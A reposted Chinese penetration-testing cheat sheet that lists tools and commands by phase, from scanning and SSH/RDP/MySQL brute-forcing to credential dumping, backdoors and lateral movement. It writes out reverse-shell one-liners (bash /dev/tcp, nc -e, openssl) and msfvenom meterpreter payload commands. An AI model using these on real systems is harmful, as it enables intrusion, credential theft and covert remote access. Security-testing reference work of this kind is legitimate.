滲透測試各階段工具速查(持續更新)


前言

        本文是滲透測試各階段工具和快速用法速查筆記,將會持續更新。轉載於https://mp.weixin.qq.com/s/jqRqrWDp1vJAMtxx6Yr9cw

站點信息收集

1
2
3
4
5
6
7
8

Google
Fofa
Shodan
Zoomeye
Goby
whatweb
Github
robtex

快速探測存活主機

nmap

1
2
3

nmap 172.18.2.1/24 -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -oG result.txt
nmap 172.18.2.1/24 -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -oX result.xml
nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -oG result.txt -iL ip.txt

格式化輸出存活ip,做后續詳細掃描使用
https://github.com/echohun/tools/blob/master/web%E6%89%AB%E6%8F%8F/nmap_clean_data.py

1
2
3
4
5
6
7
8
9
10
11

-sS:使用SYN方式掃描,默認用的是-sT方式,即TCP方式,需要完成完整的三次握手,比較費時,SYN就比較快一些了;
-Pn
:禁用PING檢測,這樣速度快,並且可以防止有些主機無法ping通而被漏掉不掃描;
-n
:禁止DNS反向解析;
–open
:只輸出檢測狀態為open的端口,即開放的端口;
–min-hostgroup 4
:調整並行掃描組的大小;
–min-parallelism 1024
:調整探測報文的並行度;
–host-timeout 30
:檢測超時的跳過
-T4
:總共有T0-T5,貌似T4比較折中
-v
:打印詳細掃描過程
-oG
:輸出為比較人性化的格式,一條記錄一行,后期好處理
-iL
:載入ip段文件,批量掃,不用一條條執行了。

 

Ipscan

 

快速探測端口

masscan的發包速度非常快,在windows中,它的發包速度可以達到每秒30萬包;在Linux中,速度可以達到每秒160萬。masscan在掃描時會隨機選擇目標IP,所以不會對遠程的主機造成壓力。
https://www.freebuf.com/sectool/112583.html

1
2
3

masscan 172.18.2.1 -p1-65535 --rate=10000
masscan -p80,8080-8100 10.0.0.0/8 -oL result_mas.txt --rate=10000
masscan -p80,8080-8100 10.0.0.0/8 -oX result_mas.txt --rate=10000

 

郵箱搜集工具

EmailSniper

子域名收集

SubDominscanner

指紋收集

whatweb -v http://baidu.com

web目錄掃描

御劍

Dirbuster

https://www.jianshu.com/p/79c7b1eda56e

webpathbrute

漏洞掃描

wvs

burpsuite

nessus(強烈推薦)

xray

爆破

hydra

1
2
3

hydra -V -l fakeroot -P top100.txt 172.18.2.177 ssh
hydra -V -l admin -P top100.txt 172.18.2.177 rdp
hydra -V -l root -P top100.txt 172.18.2.177 mysql

 

ncrack

1
2

ncrack -vv -d10 -user root -P top100.txt 172.18.2.177 -p ssh -g CL=10,at=3
ncrack -vv -d10 -user root -P top100.txt 172.18.2.177 -p mysql -g CL=10,at=3

 

medusa

1
2

medusa -v 6 -h 172.18.2.177 -u fakeroot -P top100.txt -M ssh -t 10 -O out.txt
medusa -v 6 -h 172.18.2.177 -u root -P top100.txt -M mysql -t 10 -O out.txt

 

漏洞利用

metasploit

burpsuite

sqlmap

xxer (xml注入利用工具) https://github.com/TheTwitchy/xxer

ysoserial (反序列化利用工具) https://github.com/frohoff/ysoserial

Struts2-Scan (struts2歷史漏洞掃描和利用) https://github.com/HatBoy/Struts2-Scan

weblogicScanner (weblogic歷史漏洞掃描利用) https://github.com/0xn0ne/weblogicScanner

exphub (常見web框架cve利用) https://github.com/zhzyker/exphub

cve,cms,中間件,OA系統漏洞exp合集
https://github.com/mai-lang-chai/Middleware-Vulnerability-detection

webshell

菜刀

蟻劍

冰蠍

cobalt strike

普通反彈shell

1

bash -i >& /dev/tcp/HOST/PORT 0>&1

 

加密shell

1
2
3

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.xx.xx:4444 > /tmp/s; rm /tmp/s

 

nc

1
2

攻擊機 nc -lvp 4444
靶機 nc -e /bin/bash xx.xx.xx.xx 4444

 

提權

sudo提權
http://next.uuzdaisuki.com/2020/02/12/linux%E5%B8%B8%E8%A7%81%E6%8F%90%E6%9D%83%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/

 

各類exp
典型通殺:臟牛CVE-2016-5195

 

Metasploit

 

本地漏洞掃描工具

windows/linux exploit suggester

 

本地口令獲取和破解

hash-identifier 判斷哈希類型

 

mimikatz

 

Mimipenguin

 

LaZagne
http://next.uuzdaisuki.com/2019/12/07/%E4%B8%A4%E6%AC%BE%E5%AF%86%E7%A0%81%E6%8F%90%E5%8F%96%E5%B7%A5%E5%85%B7%E7%9A%84%E9%85%8D%E7%BD%AE%E5%92%8C%E4%BD%BF%E7%94%A8/

 

hashcat+口令字典
http://next.uuzdaisuki.com/2020/07/28/%E5%93%88%E5%B8%8C%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4%E5%B7%A5%E5%85%B7hashcat/

 

1
2
3
4
5
6
7
8
9

--hash-type 0 --attack-mode 0
-m
選擇哈希類型
1000
windows nt hash
-a
選擇模式
0 Straight
(字典破解)
1 Combination
(組合破解)
3 Brute-force
(掩碼暴力破解)
6 Hybrid dict + mask
(混合字典+掩碼)
7 Hybrid mask + dict
(混合掩碼+字典)

本地信息收集

Linuxprivchecker

 

LinEnum

 

后門

常見后門手法

 

metasploit

1
2
3
4
5
6
7
8
9
10
11

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f elf -o reverse_tcp_linux64
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 -f exe -o reverse_tcp.exe
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST xxx.xxx.xxx.xxx
set LPORT 4444
run

常用后續命令
https://www.cnblogs.com/backlion/p/9484949.html

 

python直連反彈shell
http://next.uuzdaisuki.com/2018/06/17/%E5%9F%BA%E4%BA%8Epython%E7%9A%84%E7%9B%B4%E8%BF%9Eshell%E5%92%8C%E5%8F%8D%E5%B0%84shell/


其他語言直連反彈shell

 

windows常見奇淫技巧后門手法
http://next.uuzdaisuki.com/2018/06/18/windows%E5%B8%B8%E7%94%A8%E5%90%8E%E9%97%A8%E6%8A%80%E6%9C%AF%E5%8F%8A%E9%98%B2%E8%8C%83/

 

內網橫向滲透

Hydra

nessus

metasploit

nmap

powersploit

Empire

Psnmap

lcx

ew

tunna

proxychains

FRP

N2N

內網命令執行和文件訪問

at

schtasks

telnet

sc

wmic

wmiexec.vbs

python impacket wmiexec.py

psexec

遠程桌面

arp欺騙

Cain

Arpspoof

遠控

pupy類遠控

teamview

pcanywhere

radmin

手機端

DroidJack

Dendroid

典型windows-rce

ms17-010 基本通殺

cve-2019-0708 開放3389情況 windows7及之前通殺

實用工具

q-dir 文件管理工具,可開四個窗口

beyond compare 文件/文本比較工具

cmder 命令行工具

everything 文件搜索工具

navicat 數據庫連接工具,支持超多種類數據庫,支持導出數據,甚至提供拖庫的tunnel.php等

懸劍3.0 超齊全windows工具庫系統


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM